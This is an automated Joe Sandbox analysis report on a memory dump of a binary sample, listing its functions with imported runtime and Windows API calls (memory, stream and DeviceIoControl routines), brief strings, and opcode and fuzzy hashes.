Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: d4f941dda970df48a80948f096ff7b88bac27f3b7b00befcdb4b4898cb3aa907
Instruction ID: 3015eb567a07d87db35af7f47fae814fb77cf7aa6386ca5ef66cd1b06246fceb
Opcode Fuzzy Hash: d4f941dda970df48a80948f096ff7b88bac27f3b7b00befcdb4b4898cb3aa907
Instruction Fuzzy Hash: A241CD62B09B41D0EE109B56A0262A86351BF0CFD4F54463ADE5E877EDDE7CE089C300

Function 00007FF68B4C9700 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF68B4C97ED
memset.VCRUNTIME140 ref: 00007FF68B4C97FA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C9833
memcpy.VCRUNTIME140 ref: 00007FF68B4C983D
memset.VCRUNTIME140 ref: 00007FF68B4C984A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C987F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3189120677-0
Opcode ID: 65660b5ec0a92b92cb17102d7c1e6591ca514627e9a4e19134e3ef0754e25239
Instruction ID: 5e07c315febfd3e4e04e16e361bb55291f6c9715801753130732cedaba13a2f8
Opcode Fuzzy Hash: 65660b5ec0a92b92cb17102d7c1e6591ca514627e9a4e19134e3ef0754e25239
Instruction Fuzzy Hash: A941F362B1AA81D1EE11DB26A4122A96351FF48FD4F544239DF9D87BADDE3CD049C300

Function 00007FF68B4C7830 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C787C
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C7918
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C7937
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C799B
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C79A4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
String ID:
API String ID: 915423947-0
Opcode ID: d0938123501016634833643535347a7608c7b85d311b845c6036055ad67c7832
Instruction ID: 79f0a2e552e5f49df38f5b6ad68168c6456d4f6dbb71f0c35d8336186846ffc4
Opcode Fuzzy Hash: d0938123501016634833643535347a7608c7b85d311b845c6036055ad67c7832
Instruction Fuzzy Hash: 0141C122A04B86C5FB149B65E4523A92760FF48FA4F244639DB6D477EADF3CE489C300

Function 00007FF68B4C7D00 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF68B4C7D3A
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7D57
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4C7D80
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF68B4C7DCB

Part of subcall function 00007FF68B4C90B0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90DD
Part of subcall function 00007FF68B4C90B0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90F7
Part of subcall function 00007FF68B4C90B0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9129
Part of subcall function 00007FF68B4C90B0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9154
Part of subcall function 00007FF68B4C90B0: std::_Facet_Register.LIBCPMT ref: 00007FF68B4C916D
Part of subcall function 00007FF68B4C90B0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C918C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF68B4C7DE0
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7DF7

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: 6ee5363cf3669aec1283ec236c4f6ca107bc99fb734426359ee1ed55743ad2d4
Instruction ID: b909b58b421fe37c1e52a50037e60aa7d2457dbe8e36be1245f35fbcf1ac0fb4
Opcode Fuzzy Hash: 6ee5363cf3669aec1283ec236c4f6ca107bc99fb734426359ee1ed55743ad2d4
Instruction Fuzzy Hash: 3D31273261AB41C6EB508F25A86536977A4FF4CF88F141139DA8E87B68DF3CD449C740

Function 00007FF68B4B7050 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF68B4B70AF

Part of subcall function 00007FF68B4CB9C0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF68B4B70B4), ref: 00007FF68B4CB9C4
Part of subcall function 00007FF68B4CB9C0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF68B4B70B4), ref: 00007FF68B4CB9D3

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B722D

Part of subcall function 00007FF68B4C9590: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF68B4B71FA), ref: 00007FF68B4C9672

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B727B

Strings

: ", xrefs: 00007FF68B4B716A
", ", xrefs: 00007FF68B4B719D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
String ID: ", "$: "
API String ID: 2077005984-747220369
Opcode ID: cf65115a1431c84b442289c742c473fe48d1f689dcccd6f9c6b6db73ded2e6e3
Instruction ID: f671a7abf755920d74889fcdb481890e50637411519a6ece2085857be4d43394
Opcode Fuzzy Hash: cf65115a1431c84b442289c742c473fe48d1f689dcccd6f9c6b6db73ded2e6e3
Instruction Fuzzy Hash: C6617962B04B409AEB04DFA5D1523AC2362FB48B88F108539EF5D97BA9DF38D555C380

Function 00007FF68B49E9B0 Relevance: 8.8, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B49EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68B49E9D0), ref: 00007FF68B49EB76
Part of subcall function 00007FF68B49EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68B49E9D0), ref: 00007FF68B49EC19
Part of subcall function 00007FF68B49EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68B49E9D0), ref: 00007FF68B49EC42

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49E9EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAD3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAF4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 36118ffba3ed1544818bac441154d4563467c57fa6e8cefbf7dc2a3f9863e97f
Instruction ID: 9b31c4fb6446532e7a69b86d496092c28a24f9f7db16723aecce175c0852be5d
Opcode Fuzzy Hash: 36118ffba3ed1544818bac441154d4563467c57fa6e8cefbf7dc2a3f9863e97f
Instruction Fuzzy Hash: 1241F531A4AB42C6EA598F55E59123837A0FF48F40B494439CE1D8337AEF3DE955C740

Function 00007FF68B4812A0 Relevance: 8.8, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA31
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA5A
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA83
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAB8
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAE1
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BB10
Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49BB94

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4812CD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4812F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481314
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481336
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481358
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48137A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48139C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c08c9ad099b94047ebeba4421537832623ccdabfcd516ae9a7ad386d1ad22c2f
Instruction ID: 803fe54c70e11ceb1cdef4c0845ab83edfb078b8cea8ffcaf4c15b739e16e533
Opcode Fuzzy Hash: c08c9ad099b94047ebeba4421537832623ccdabfcd516ae9a7ad386d1ad22c2f
Instruction Fuzzy Hash: 63312920A5A682C5FE658F51D49167923A0FF4DF00F0C543EC90ED76BAEF2CA944C394

Function 00007FF68B481450 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B482050: memset.VCRUNTIME140(?,?,?,00007FF68B481489), ref: 00007FF68B48213F

memset.VCRUNTIME140 ref: 00007FF68B4818E4

Part of subcall function 00007FF68B4A10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A10F0
Part of subcall function 00007FF68B4A10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A1119
Part of subcall function 00007FF68B4A10C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A1142

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4819C0
memset.VCRUNTIME140 ref: 00007FF68B481C7C
memset.VCRUNTIME140 ref: 00007FF68B481CAC

Strings

##Overlay, xrefs: 00007FF68B481B99

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memset$free$malloc
String ID: ##Overlay
API String ID: 1393892039-3248624929
Opcode ID: e60084c3b1010948b4154768d3bb7ebc0b90b260b635dcb7335227345dd38c4b
Instruction ID: 8eff9a705c9c91740627238e9fc30b65669d5b0fd418da5824477767564e27aa
Opcode Fuzzy Hash: e60084c3b1010948b4154768d3bb7ebc0b90b260b635dcb7335227345dd38c4b
Instruction Fuzzy Hash: 8B22E132505BC189D310DF29E8441D877A8FB45F68FAC433AEAA40B398DF74A1A1C768

Function 00007FF68B493950 Relevance: 7.6, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49398B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4939CF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493A0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493A30
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493A55
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493A7E

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6bcadec244314d441987c25ba5b3647a26f387ba020272134a96f1e2547d8c90
Instruction ID: fbe5afda1bd944e3e4d7e267a420335d4eb1942360e277f307f3a0af8f5ae3e9
Opcode Fuzzy Hash: 6bcadec244314d441987c25ba5b3647a26f387ba020272134a96f1e2547d8c90
Instruction Fuzzy Hash: 5631F521A4A681C6EA958F61D55527833A0FF8AF40F49543AC90ED73B9EF3CE944C710

Function 00007FF68B4C7500 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C753B
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF68B4C755A
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C758C
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C75A7
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4C75F3

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID:
API String ID: 1830095303-0
Opcode ID: e54aefa859e89064fcb29190908f3b436e7fcc425140c088158f95217a78a637
Instruction ID: 93ca30161c6811a4529bc88bf340020bf83493f327497b99abcd7ab55549bc28
Opcode Fuzzy Hash: e54aefa859e89064fcb29190908f3b436e7fcc425140c088158f95217a78a637
Instruction Fuzzy Hash: B6314732605B81C5EB108F29E6A572D7BA0FB49F89F048139DA5D83728CF3DD56AC740

Function 00007FF68B4C6790 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C67C3
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF68B4C67E2
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C6814
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C682F

Part of subcall function 00007FF68B4C7D00: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF68B4C7D3A
Part of subcall function 00007FF68B4C7D00: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7D57
Part of subcall function 00007FF68B4C7D00: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4C7D80
Part of subcall function 00007FF68B4C7D00: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF68B4C7DCB
Part of subcall function 00007FF68B4C7D00: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF68B4C7DE0

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4C687B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
String ID:
API String ID: 2682282330-0
Opcode ID: ce3dd0867776183b89d192c1dc58066f1ba364c6306f65d87bf7f2383671e37d
Instruction ID: a6306d919cc8b3332440c7c501262d3381a1417bddeda35e106ea7ca44764919
Opcode Fuzzy Hash: ce3dd0867776183b89d192c1dc58066f1ba364c6306f65d87bf7f2383671e37d
Instruction Fuzzy Hash: 8F21E636649B41C6EB108F25F86572A77A4FB49F88F048139DA8D83B68DF3DE149C741

Function 00007FF68B4B2530 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C8050: DeviceIoControl.KERNEL32 ref: 00007FF68B4C8109

Part of subcall function 00007FF68B4C8150: DeviceIoControl.KERNEL32 ref: 00007FF68B4C8209

DeviceIoControl.KERNEL32 ref: 00007FF68B4B262E
DeviceIoControl.KERNEL32 ref: 00007FF68B4B26B0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2769

Strings

NPC, xrefs: 00007FF68B4B278B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
String ID: NPC
API String ID: 2054765191-3492492454
Opcode ID: 4f3d81cd193f8d4480fc7a634ee03ff8aec5643986a2c8ea27ff1b570589ecce
Instruction ID: 3c347157c892e283f38bc8d35b60816cfea56ee74e2550f33dbdfd3fb9280118
Opcode Fuzzy Hash: 4f3d81cd193f8d4480fc7a634ee03ff8aec5643986a2c8ea27ff1b570589ecce
